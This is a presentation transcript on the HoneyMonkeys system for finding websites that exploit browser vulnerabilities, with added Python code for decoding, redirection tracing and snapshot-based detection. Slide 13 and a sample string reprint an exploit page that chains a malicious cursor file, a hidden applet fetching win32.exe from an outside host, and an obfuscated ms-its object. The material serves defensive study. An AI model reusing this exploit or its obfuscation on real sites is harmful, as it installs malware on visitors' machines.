Automated Web Patrol with Strider HoneyMonkeys (presentation transcript)

Learn more at: http://www.cs.ucf.edu
1
Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That Exploit Browser Vulnerabilities
AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev, Chad Verbowski, Shuo Chen, and Sam King
PUBLISHED BY: Microsoft Research, Redmond
2
PROPOSED PROBLEM
  • An emerging class of Internet attacks
  • Attacks launched by malicious web sites
  • They exploit browser vulnerabilities
  • They install malicious content on the visitor's machine
  • Proposed solution: HoneyMonkeys

3
BROWSER-BASED ATTACKS: THE FOUR STAGES
Code obfuscation
URL redirection
Vulnerability exploitation
Malware installation
4
CODE OBFUSCATION
5
CODE OBFUSCATION
  • Used to escape signature-based scanning
  • A custom decoding routine is included inside the script
  • Long, unreadable strings are encoded and decoded later, either by the script or by the browser

6
ENCODED MALICIOUS CODE
7
DECODED MALICIOUS CODE
8
URL REDIRECTION
9
URL REDIRECTION
  • The primary URL (the one the user visits) redirects to a secondary URL that hosts the exploit
  • Protocol-level redirection using an HTTP 302 Temporary Redirect
  • HTML tags (for example an iframe or a meta refresh)
  • Script functions, including window.location.replace()

10
URL REDIRECTION
[Diagram: the USER visits the PRIMARY URL http://IP address/, which redirects to the SECONDARY URL http://IP address/8 chars/test2/iejp.htm]
11
VULNERABILITY EXPLOITATION
12
VULNERABILITY EXPLOITATION
  • A malicious web site typically attempts to exploit multiple vulnerabilities
  • The exploit page is assembled from multiple HTML fragments and files fetched from different URLs
  • Code is injected dynamically using document.write()
  • Once an exploit succeeds, a Trojan downloader fetches and installs further malware
  • Internet Explorer was the most attacked browser

13
EXAMPLE FOR VULNERABILITY
<html><head><title></title></head><body>
<style> CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr") </style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
  <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'>
</APPLET>
<script>
try {
  document.write('<object data=&#109;&#115;&#45;&#105;&#116;&#115;&#58;&#109;&#104;&#116;&#109;&#108;&#58;&#102;&#105;&#108;&#101;&#58;// C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m/targ'+'et.htm type=text/x-scriptlet></ob'+'ject>')
} catch(e) {}
</script>
</body></html>
Exploit 1: the CSS cursor that loads the malicious cursor file sploit.anr
Exploit 2: the 1x1 Java applet BlackBox.class, which is handed win32.exe as its url parameter
Exploit 3: the document.write() call that assembles an <object> whose data attribute, once the &#NNN; references are decoded and the split strings joined, reads ms-its:mhtml:file:// C:\foo.mht!http://vxxxxxxe.biz//adverts//033//targ.chm/target.htm
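The encoded/decoded code slides are images, so as an added worked example (not code from the paper or from this presentation) here is the decoding that the obfuscation slide and the document.write() slide describe, run over a constructed copy of the exploit page above. It joins the 'a'+'b' split string, decodes the decimal character references and lists the URLs a scanner sees before and after decoding. The sample page, the function names and the regular expressions are my assumptions; the defanged host vxxxxxxe.biz is the slide's own placeholder.

```python
import html
import re

# Constructed sample modelled on the slide's exploit page (defanged host kept
# as on the slide); it is only parsed here, never rendered.
SAMPLE_PAGE = r"""<html><head><title></title></head><body>
<style> CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr") </style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
<PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET>
<script>
try { document.write('<object data=&#109;&#115;&#45;&#105;&#116;&#115;&#58;&#109;&#104;&#116;&#109;&#108;&#58;&#102;&#105;&#108;&#101;&#58;//C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m/targ'+'et.htm type=text/x-scriptlet></ob'+'ject>') } catch(e) {}
</script>
</body></html>"""

# Schemes worth flagging; ms-its/mhtml are the ones the decoded payload uses.
URL_RE = re.compile(r"""(?:https?|ms-its|mhtml|file):[^\s'"<>]+""", re.I)
JS_STRING = re.compile(r"'((?:[^'\\]|\\.)*)'")  # one single-quoted JS literal


def _call_argument(src: str, open_paren: int) -> str:
    """Text between balanced parentheses starting at src[open_paren] == '(',
    skipping quoted strings so a ')' inside a literal does not end the call."""
    depth, quote, i = 0, None, open_paren
    while i < len(src):
        c = src[i]
        if quote:
            if c == "\\":
                i += 1  # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i]
        i += 1
    raise ValueError("unbalanced parentheses in script")


def join_split_strings(js_expr: str) -> str:
    """Concatenate the literals of a JS 'a'+'b'+'c' expression. Splitting a URL
    across literals hides it from substring signatures; the browser only ever
    sees the joined result. JS escapes such as \\f are left untouched here."""
    return "".join(JS_STRING.findall(js_expr))


def decode_document_write(page: str) -> list:
    """Markup each document.write(...) call would inject, after joining split
    strings and decoding &#NNN; / &#xNN; character references."""
    injected = []
    for m in re.finditer(r"document\.write\s*\(", page):
        joined = join_split_strings(_call_argument(page, m.end() - 1))
        injected.append(html.unescape(joined))
    return injected


def urls_in_raw(page: str) -> list:
    """What a signature scanner sees without decoding: only fragments."""
    return URL_RE.findall(page)


def urls_after_decoding(page: str) -> list:
    """Raw URLs plus those assembled at run time inside document.write()."""
    urls = urls_in_raw(page)
    for markup in decode_document_write(page):
        urls += URL_RE.findall(markup)
    return urls


if __name__ == "__main__":
    for u in urls_after_decoding(SAMPLE_PAGE):
        print(u)
```

On the raw page the scanner recovers the cursor and applet URLs but only the fragment http://vxxxx from the script; after joining and decoding, the full ms-its:mhtml:file:// target appears, which is exactly what a static signature on the encoded form would miss.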
14
Honey Monkey Exploit Detection System
  • Active client-side honeypots: browsers driven automatically inside virtual machines
  • Large-scale, systematic and automated web patrol
  • Mimics human browsing
  • VMs run at different patch levels, and hence with different levels of vulnerability

15
HONEYMONKEY SYSTEM
  • Stage 1: scalable mode, visiting N URLs per VM at a time to find exploit URLs quickly
  • Stage 2: revisit each exploit URL on its own and perform recursive redirection analysis
  • Stage 3: rescan the exploit URLs using fully patched VMs to find exploits of vulnerabilities that have no patch yet

16
HONEY MONKEY SYSTEM
17
TOPOLOGY GRAPH AND NODE RANKING
  • Rectangular nodes represent exploit URLs
  • Arrows represent traffic redirection
  • Circles represent nodes that act as aggregation points for the exploit pages they host
  • Node R, with the most incoming redirections, is the most likely exploit provider

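As an added example (not the paper's code) covering the URL redirection slide, the Stage-2 recursive redirection analysis and the topology graph above: a small recursive follower that recognises the three redirection mechanisms the slides list (HTTP 302 Location, HTML tags such as meta refresh and iframe, window.location.replace()), records every hop as an edge, and then ranks nodes by how many distinct URLs redirect into them, which singles out the aggregation point R. The responses are constructed in a dictionary so nothing is fetched; all *.example hosts and the function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urljoin

# Constructed responses standing in for what a honeymonkey VM would record:
# URL -> (status, headers, body). Every *.example host is an assumption.
RESPONSES = {
    "http://primary-a.example/": (302, {"Location": "/landing.htm"}, ""),
    "http://primary-a.example/landing.htm": (200, {},
        '<script>window.location.replace("http://provider-r.example/adverts/033/x.htm")</script>'),
    "http://primary-b.example/": (200, {},
        '<meta http-equiv="refresh" content="0; url=http://provider-r.example/adverts/033/x.htm">'),
    "http://primary-c.example/": (200, {},
        '<iframe src="http://relay.example/e.htm" width=1 height=1></iframe>'),
    "http://relay.example/e.htm": (200, {},
        '<script>window.location.replace("http://provider-r.example/adverts/033/x.htm")</script>'),
    "http://provider-r.example/adverts/033/x.htm": (200, {}, "<html>exploit landing page</html>"),
}

# HTML-tag and script redirections; the 302 case is handled from the headers.
META_REFRESH = re.compile(r"""<meta[^>]+http-equiv=["']?refresh["']?[^>]+url=([^"'>\s]+)""", re.I)
IFRAME_SRC = re.compile(r"""<iframe[^>]+src=["']?([^"'>\s]+)""", re.I)
LOCATION_REPLACE = re.compile(r"""location\.replace\(\s*["']([^"']+)["']\s*\)""", re.I)


def redirect_targets(url, status, headers, body):
    """Every next hop this response sends the browser to, as absolute URLs."""
    targets = []
    if status in (301, 302, 303, 307) and "Location" in headers:
        targets.append(headers["Location"])
    for pattern in (META_REFRESH, IFRAME_SRC, LOCATION_REPLACE):
        targets += pattern.findall(body)
    return [urljoin(url, t) for t in targets]


def follow_redirections(url, fetch, graph, seen, depth=0, max_depth=10):
    """Stage-2 style recursive analysis: record an edge for every hop and keep
    following until the chain ends, loops back, or exceeds max_depth."""
    if url in seen or depth > max_depth:
        return
    seen.add(url)
    response = fetch(url)
    if response is None:
        return
    for nxt in redirect_targets(url, *response):
        graph[nxt].add(url)  # graph maps target -> set of URLs redirecting to it
        follow_redirections(nxt, fetch, graph, seen, depth + 1, max_depth)


def build_topology(primary_urls, fetch=RESPONSES.get):
    """Topology graph over the primary URLs flagged in Stage 1."""
    graph = defaultdict(set)
    seen = set()
    for url in primary_urls:
        follow_redirections(url, fetch, graph, seen)
    return graph


def rank_by_in_degree(graph):
    """Nodes ordered by how many distinct URLs redirect into them. The top entry
    is the aggregation point most likely to be the exploit provider (R)."""
    return sorted(((t, len(s)) for t, s in graph.items()), key=lambda x: (-x[1], x[0]))


if __name__ == "__main__":
    g = build_topology(["http://primary-a.example/",
                        "http://primary-b.example/",
                        "http://primary-c.example/"])
    for node, count in rank_by_in_degree(g):
        print(count, node, "<-", sorted(g[node]))
```

The shared seen set keeps the walk from re-crawling a provider reached from several primaries while still recording each incoming edge, which is what the in-degree ranking needs; the depth bound stops redirect loops that the seen set would not catch when URLs carry changing query strings.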
18
TOPOLOGY GRAPH AND NODE RANKING
19
GENERATING URL LISTS
  • Suspicious URLs
  • Popular web sites: if attacked, they can potentially reach a much larger population
  • Localized-space web sites

20
Exploit Detection Report
  • Executable files created or modified outside the browser sandbox folders
  • Processes created
  • Windows registry entries created or modified
  • Vulnerability exploited
  • Redirect URLs visited

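An added example (not the paper's Strider tooling) of the black-box, non-signature detection the report slide describes: snapshot the VM's files, processes and registry before and after a visit, diff the two, and flag only executables written outside the browser's sandbox folders, new processes and registry changes. The sandbox folder paths, the snapshots and the dropped file name are constructed for illustration.

```python
from dataclasses import dataclass, field

# Assumed locations of the browser's sandbox folders on the monkey VM; an
# executable written anywhere else cannot come from a normal page visit.
SANDBOX_DIRS = (
    r"C:\Documents and Settings\monkey\Local Settings\Temporary Internet Files",
    r"C:\Documents and Settings\monkey\Local Settings\Temp",
)
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".sys", ".scr", ".ocx", ".com")


@dataclass
class Snapshot:
    """State captured before and after the monkey visits a URL (constructed)."""
    files: dict = field(default_factory=dict)      # path -> content digest
    processes: set = field(default_factory=set)    # running image names
    registry: dict = field(default_factory=dict)   # key\value -> data


def _under(path, roots):
    """Case-insensitive 'path lies inside one of roots' test for Windows paths."""
    p = path.lower()
    return any(p.startswith(root.lower().rstrip("\\") + "\\") for root in roots)


def exploit_report(before, after, visited_url, sandbox_dirs=SANDBOX_DIRS):
    """Diff two snapshots and report the changes the slide lists as evidence."""
    new_executables = sorted(
        path for path, digest in after.files.items()
        if before.files.get(path) != digest
        and path.lower().endswith(EXECUTABLE_SUFFIXES)
        and not _under(path, sandbox_dirs)
    )
    new_processes = sorted(after.processes - before.processes)
    changed_registry = sorted(
        key for key, data in after.registry.items() if before.registry.get(key) != data
    )
    return {
        "url": visited_url,
        "executables_outside_sandbox": new_executables,
        "processes_created": new_processes,
        "registry_changed": changed_registry,
        "exploited": bool(new_executables or new_processes or changed_registry),
    }


# Constructed before/after snapshots for one visit to an exploit page.
BEFORE = Snapshot(
    files={r"C:\WINDOWS\system32\kernel32.dll": "k32"},
    processes={"explorer.exe", "iexplore.exe"},
    registry={r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon": "ctfmon.exe"},
)
AFTER = Snapshot(
    files={
        r"C:\WINDOWS\system32\kernel32.dll": "k32",
        # cached by the browser itself: inside the sandbox, so not evidence
        SANDBOX_DIRS[0] + r"\sploit[1].anr": "anr",
        SANDBOX_DIRS[0] + r"\count[1].jar": "jar",
        # dropped by the exploit chain: outside the sandbox
        r"C:\WINDOWS\system32\win32.exe": "dropper",
    },
    processes={"explorer.exe", "iexplore.exe", "win32.exe"},
    registry={
        r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon": "ctfmon.exe",
        r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\win32": r"C:\WINDOWS\system32\win32.exe",
    },
)

if __name__ == "__main__":
    print(exploit_report(BEFORE, AFTER, "http://vxxxxxxe.biz/adverts/033/"))
```

Because the verdict rests on state changes rather than on the content of the page, a newly obfuscated or split exploit is caught the same way as a known one; the trade-off is that a page which exploits the browser but writes nothing outside the sandbox and spawns nothing leaves no trace in this report.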
21
Patch level statistics
22
RESULTS
23
24
ADVANTAGES
  • Automatic
  • Scalable
  • Non-signature-based approach
  • Staged detection

25
DISADVANTAGES
  • Exploiters may randomize the attack, confusing the honeymonkeys
  • Exploiters were able to detect honeymonkeys by popping up a dialog box
  • The authors did not explain the topology graphs very clearly

26
IMPROVEMENTS
  • The authors need to work on accuracy
  • They need more classification according to content
  • They should make the honeymonkeys harder for exploiters to detect